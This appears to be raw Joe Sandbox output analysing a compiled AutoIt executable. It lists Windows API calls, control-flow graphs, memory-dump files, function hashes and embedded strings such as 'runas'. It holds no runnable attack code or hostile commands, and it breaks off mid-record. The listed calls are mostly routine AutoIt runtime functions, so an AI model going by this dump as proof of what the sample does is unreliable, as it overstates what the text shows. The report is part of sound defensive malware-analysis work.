                                                  • Part of subcall function 00F839D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F83A03
                                                  • Part of subcall function 00F839D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83A24
                                                  • Part of subcall function 00F839D5: ShowWindow.USER32(00000000,?,?), ref: 00F83A38
                                                  • Part of subcall function 00F839D5: ShowWindow.USER32(00000000,?,?), ref: 00F83A41
                                                  • Part of subcall function 00F8434A: _memset.LIBCMT ref: 00F84370
                                                  • Part of subcall function 00F8434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F84415
                                                Strings
                                                • This is a third-party compiled AutoIt script., xrefs: 00FBD279
                                                • runas, xrefs: 00FBD33A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                • API String ID: 529118366-3287110873
                                                • Opcode ID: 4b5a65a39568ac89054f307cb63d77d8c8a7e77c66fa7de1f69a44cd9cd8bdab
                                                • Instruction ID: 59edb9e05b84e01c64bad5d3744435abdec1037fcf83eaedb2228537770b4a79
                                                • Opcode Fuzzy Hash: 4b5a65a39568ac89054f307cb63d77d8c8a7e77c66fa7de1f69a44cd9cd8bdab
                                                • Instruction Fuzzy Hash: 675157B5E04209AFCF21FBB5DD42EFD7BB8AF46710F00405AF491A6152DA798605FB21

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 996 f849a0-f84a00 call f87667 GetVersionExW call f87bcc 1001 f84b0b-f84b0d 996->1001 1002 f84a06 996->1002 1003 fbd767-fbd773 1001->1003 1004 f84a09-f84a0e 1002->1004 1005 fbd774-fbd778 1003->1005 1006 f84b12-f84b13 1004->1006 1007 f84a14 1004->1007 1009 fbd77b-fbd787 1005->1009 1010 fbd77a 1005->1010 1008 f84a15-f84a4c call f87d2c call f87726 1006->1008 1007->1008 1018 f84a52-f84a53 1008->1018 1019 fbd864-fbd867 1008->1019 1009->1005 1012 fbd789-fbd78e 1009->1012 1010->1009 1012->1004 1014 fbd794-fbd79b 1012->1014 1014->1003 1016 fbd79d 1014->1016 1020 fbd7a2-fbd7a5 1016->1020 1018->1020 1021 f84a59-f84a64 1018->1021 1022 fbd869 1019->1022 1023 fbd880-fbd884 1019->1023 1024 fbd7ab-fbd7c9 1020->1024 1025 f84a93-f84aaa GetCurrentProcess IsWow64Process 1020->1025 1026 fbd7ea-fbd7f0 1021->1026 1027 f84a6a-f84a6c 1021->1027 1028 fbd86c 1022->1028 1030 fbd86f-fbd878 1023->1030 1031 fbd886-fbd88f 1023->1031 1024->1025 1029 fbd7cf-fbd7d5 1024->1029 1032 f84aac 1025->1032 1033 f84aaf-f84ac0 1025->1033 1038 fbd7fa-fbd800 1026->1038 1039 fbd7f2-fbd7f5 1026->1039 1034 f84a72-f84a75 1027->1034 1035 fbd805-fbd811 1027->1035 1028->1030 1036 fbd7df-fbd7e5 1029->1036 1037 fbd7d7-fbd7da 1029->1037 1030->1023 1031->1028 1040 fbd891-fbd894 1031->1040 1032->1033 1041 f84b2b-f84b35 GetSystemInfo 1033->1041 1042 f84ac2-f84ad2 call f84b37 1033->1042 1043 f84a7b-f84a8a 1034->1043 1044 fbd831-fbd834 1034->1044 1046 fbd81b-fbd821 1035->1046 1047 fbd813-fbd816 1035->1047 1036->1025 1037->1025 1038->1025 1039->1025 1040->1030 1045 f84af8-f84b08 1041->1045 1053 f84b1f-f84b29 GetSystemInfo 1042->1053 1054 f84ad4-f84ae1 call f84b37 1042->1054 1050 f84a90 1043->1050 1051 fbd826-fbd82c 1043->1051 1044->1025 1049 fbd83a-fbd84f 1044->1049 1046->1025 1047->1025 1055 fbd859-fbd85f 1049->1055 1056 fbd851-fbd854 1049->1056 1050->1025 1051->1025 1058 f84ae9-f84aed 1053->1058 1061 f84b18-f84b1d 1054->1061 1062 f84ae3-f84ae7 GetNativeSystemInfo 1054->1062 1055->1025 1056->1025 1058->1045 1060 f84aef-f84af2 FreeLibrary 1058->1060 1060->1045 1061->1062 1062->1058
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00F849CD
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                • GetCurrentProcess.KERNEL32(?,0100FAEC,00000000,00000000,?), ref: 00F84A9A
                                                • IsWow64Process.KERNEL32(00000000), ref: 00F84AA1
                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F84AE7
                                                • FreeLibrary.KERNEL32(00000000), ref: 00F84AF2
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00F84B23
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00F84B2F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: f7411e6dad1ef5e1999ebc4e81adbbff262556263ea49ee4d916ad2d294bc8d7
                                                • Instruction ID: 0e75591c996ebad9559f8c13260858f1c3d146dace3ffe8bfff3e64673c90928
                                                • Opcode Fuzzy Hash: f7411e6dad1ef5e1999ebc4e81adbbff262556263ea49ee4d916ad2d294bc8d7
                                                • Instruction Fuzzy Hash: 4191F53198D7C2DEC735EB7884502EABFF5AF2A310B14495ED0C797A01D224F508EB5A

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1063 f84e89-f84ea1 CreateStreamOnHGlobal 1064 f84ec1-f84ec6 1063->1064 1065 f84ea3-f84eba FindResourceExW 1063->1065 1066 fbd933-fbd942 LoadResource 1065->1066 1067 f84ec0 1065->1067 1066->1067 1068 fbd948-fbd956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 fbd95c-fbd967 LockResource 1068->1069 1069->1067 1070 fbd96d-fbd98b 1069->1070 1070->1067
                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F84D8E,?,?,00000000,00000000), ref: 00F84E99
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F84D8E,?,?,00000000,00000000), ref: 00F84EB0
                                                • LoadResource.KERNEL32(?,00000000,?,?,00F84D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F84E2F), ref: 00FBD937
                                                • SizeofResource.KERNEL32(?,00000000,?,?,00F84D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F84E2F), ref: 00FBD94C
                                                • LockResource.KERNEL32(00F84D8E,?,?,00F84D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F84E2F,00000000), ref: 00FBD95F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT
                                                • API String ID: 3051347437-3967369404
                                                • Opcode ID: a746a0e8a1cf6356dc2c7f8cfb843168754a8a0e86f643769fb26b51db59ca62
                                                • Instruction ID: e58c0d8ba04c60876690952ea985a77e1fdc0aed467a9dd771cda29d89bf4e7b
                                                • Opcode Fuzzy Hash: a746a0e8a1cf6356dc2c7f8cfb843168754a8a0e86f643769fb26b51db59ca62
                                                • Instruction Fuzzy Hash: F3115E75640702BFD7319B65EC48FA77BBAFBC5B51F10426CF44596250EB62E800AB60
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00FBE398), ref: 00FE446A
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 00FE447B
                                                • FindClose.KERNEL32(00000000), ref: 00FE448B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 9ada58c725e0ae16bd2afafe39050fd083b1ab25c228348603100e2290fb2d69
                                                • Instruction ID: 3071ee558f703763535e24eef13d4c03bd793678eaf1ee51339237d1acb44d70
                                                • Opcode Fuzzy Hash: 9ada58c725e0ae16bd2afafe39050fd083b1ab25c228348603100e2290fb2d69
                                                • Instruction Fuzzy Hash: 98E0DF339109426B8230EB38EC0D9EA779C9E05335F20470AFE75C20D0EBB8A900B696
                                                Strings
                                                • Variable must be of type 'Object'., xrefs: 00FC3E62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Variable must be of type 'Object'.
                                                • API String ID: 0-109567571
                                                • Opcode ID: 7200437c12c913a5aa71b06a74b85c36128858381270f7c9d6ed767a787bac60
                                                • Instruction ID: 826945641fb4a2735a58187f342bad20b1a48d73d6c9840567daabab1bf2d6b3
                                                • Opcode Fuzzy Hash: 7200437c12c913a5aa71b06a74b85c36128858381270f7c9d6ed767a787bac60
                                                • Instruction Fuzzy Hash: 0EA28975E00206CFCB24EF54C980AEEB7B2FB59324F248069E905AB351D735ED46EB90
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F90A5B
                                                • timeGetTime.WINMM ref: 00F90D16
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F90E53
                                                • Sleep.KERNEL32(0000000A), ref: 00F90E61
                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 00F90EFA
                                                • DestroyWindow.USER32 ref: 00F90F06
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F90F20
                                                • Sleep.KERNEL32(0000000A,?,?), ref: 00FC4E83
                                                • TranslateMessage.USER32(?), ref: 00FC5C60
                                                • DispatchMessageW.USER32(?), ref: 00FC5C6E
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FC5C82
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                • API String ID: 4212290369-3242690629
                                                • Opcode ID: 0aeeb96a8777816178920aaa2d48beb01c2a35479fbeb5e29fc235a72bd78d5e
                                                • Instruction ID: 51c8291069a6ddea1f042abd854910601cf08132696a64b39f82456dd3d1dce6
                                                • Opcode Fuzzy Hash: 0aeeb96a8777816178920aaa2d48beb01c2a35479fbeb5e29fc235a72bd78d5e
                                                • Instruction Fuzzy Hash: 26B21470608742DFDB24DF24C985FAAB7E5BF84714F14491DE48A87291CB79F884EB82

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00FE8F5F: __time64.LIBCMT ref: 00FE8F69
                                                  • Part of subcall function 00F84EE5: _fseek.LIBCMT ref: 00F84EFD
                                                • __wsplitpath.LIBCMT ref: 00FE9234
                                                  • Part of subcall function 00FA40FB: __wsplitpath_helper.LIBCMT ref: 00FA413B
                                                • _wcscpy.LIBCMT ref: 00FE9247
                                                • _wcscat.LIBCMT ref: 00FE925A
                                                • __wsplitpath.LIBCMT ref: 00FE927F
                                                • _wcscat.LIBCMT ref: 00FE9295
                                                • _wcscat.LIBCMT ref: 00FE92A8
                                                  • Part of subcall function 00FE8FA5: _memmove.LIBCMT ref: 00FE8FDE
                                                  • Part of subcall function 00FE8FA5: _memmove.LIBCMT ref: 00FE8FED
                                                • _wcscmp.LIBCMT ref: 00FE91EF
                                                  • Part of subcall function 00FE9734: _wcscmp.LIBCMT ref: 00FE9824
                                                  • Part of subcall function 00FE9734: _wcscmp.LIBCMT ref: 00FE9837
                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FE9452
                                                • _wcsncpy.LIBCMT ref: 00FE94C5
                                                • DeleteFileW.KERNEL32(?,?), ref: 00FE94FB
                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FE9511
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FE9522
                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FE9534
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 1500180987-0
                                                • Opcode ID: 24a90e3d13835d65d2284039c2551d843f937de646931136889ed228d2969ea0
                                                • Instruction ID: 1e966525d04faf5c8d7612e451199a03df7bb1d1fda0ec3610909d0ec622e28a
                                                • Opcode Fuzzy Hash: 24a90e3d13835d65d2284039c2551d843f937de646931136889ed228d2969ea0
                                                • Instruction Fuzzy Hash: F4C15CB1D04219ABDF21EF95CC81ADEB7BDEF95310F0040AAF609E7141EB749A44AF61

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00F83074
                                                • RegisterClassExW.USER32(00000030), ref: 00F8309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                                                • LoadIconW.USER32(000000A9), ref: 00F830F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 8da9a99bb007cfa9af676246cea9e9a49d1555ab55dca5cf03147d1e9690b643
                                                • Instruction ID: 35dc39006de9c1e4b56f6f233ce7010085807de0a819a06c40b3406fe2faad80
                                                • Opcode Fuzzy Hash: 8da9a99bb007cfa9af676246cea9e9a49d1555ab55dca5cf03147d1e9690b643
                                                • Instruction Fuzzy Hash: 0B3136B584134AAFEB62CFA4E989ACDBBF0FB09310F14451EE5C0E6284D7BA0585DF51

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00F83074
                                                • RegisterClassExW.USER32(00000030), ref: 00F8309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                                                • LoadIconW.USER32(000000A9), ref: 00F830F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 9c245e5bf9d2dcc8e85d573eaeff51fccdccd026f318fc50ed43770a7f11f7e7
                                                • Instruction ID: 6d177253427832c3a9c82a9df880f000d24cdd19a2710622a817d77203c05fac
                                                • Opcode Fuzzy Hash: 9c245e5bf9d2dcc8e85d573eaeff51fccdccd026f318fc50ed43770a7f11f7e7
                                                • Instruction Fuzzy Hash: A521F4B5900209AFEB21DFA4E988BDDBBF4FB08700F00411AF990E6284DBBA45449F91

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00F84706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010452F8,?,00F837AE,?), ref: 00F84724
                                                  • Part of subcall function 00FA050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F87165), ref: 00FA052D
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F871A8
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FBE8C8
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FBE909
                                                • RegCloseKey.ADVAPI32(?), ref: 00FBE947
                                                • _wcscat.LIBCMT ref: 00FBE9A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: a4fb24ee24cc4e3a9f49862ea2f37f473bfb87ee5b25ddb8d121a20d9dbec097
                                                • Instruction ID: fa4091d32f1f1cadd62c61e28f20551ea7055820d91c396d7d43cc2f3e9fd0aa
                                                • Opcode Fuzzy Hash: a4fb24ee24cc4e3a9f49862ea2f37f473bfb87ee5b25ddb8d121a20d9dbec097
                                                • Instruction Fuzzy Hash: 0671A2B5508701AFC724EF65EA8199BB7E8FF86310F40052EF485871A4EB3AD948DB51

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00F83A50
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00F83A5F
                                                • LoadIconW.USER32(00000063), ref: 00F83A76
                                                • LoadIconW.USER32(000000A4), ref: 00F83A88
                                                • LoadIconW.USER32(000000A2), ref: 00F83A9A
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F83AC0
                                                • RegisterClassExW.USER32(?), ref: 00F83B16
                                                  • Part of subcall function 00F83041: GetSysColorBrush.USER32(0000000F), ref: 00F83074
                                                  • Part of subcall function 00F83041: RegisterClassExW.USER32(00000030), ref: 00F8309E
                                                  • Part of subcall function 00F83041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                                                  • Part of subcall function 00F83041: InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                                                  • Part of subcall function 00F83041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                                                  • Part of subcall function 00F83041: LoadIconW.USER32(000000A9), ref: 00F830F2
                                                  • Part of subcall function 00F83041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: 29ea1d5d23207383114390d0f3e2ecb85b7bf35a97a970a8b441330e07ae9cd8
                                                • Instruction ID: e615356ea012217018065c82788bdc6d4102cec2637757fbddeb83a29f2212fd
